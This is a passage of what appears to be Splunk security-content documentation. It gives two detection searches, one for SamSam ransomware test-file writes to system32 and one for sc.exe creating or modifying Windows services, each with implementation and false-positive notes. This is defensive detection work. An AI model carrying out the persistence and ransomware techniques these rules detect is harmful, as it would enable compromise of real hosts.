  • ATT&CK: T1486
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name from datamodel=Endpoint.Filesystem where Filesystem.file_path=*\\windows\\system32\\test.txt by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `samsam_test_file_write_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

  • Delivery


Known False Positives

No false positives have been identified.

Reference

Test Dataset


version: 1


Sc exe manipulating windows services

This search looks for arguments to sc.exe indicating the creation or modification of a Windows service.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1543.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="* config *") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sc_exe_manipulating_windows_services_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1543.003 Windows Service Persistence, Privilege Escalation


Kill Chain Phase

  • Installation


Known False Positives

Using sc.exe to manipulate Windows services is uncommon. However, there may be legitimate instances of this behavior. It is important to validate and investigate as appropriate.

Reference

Test Dataset


version: 4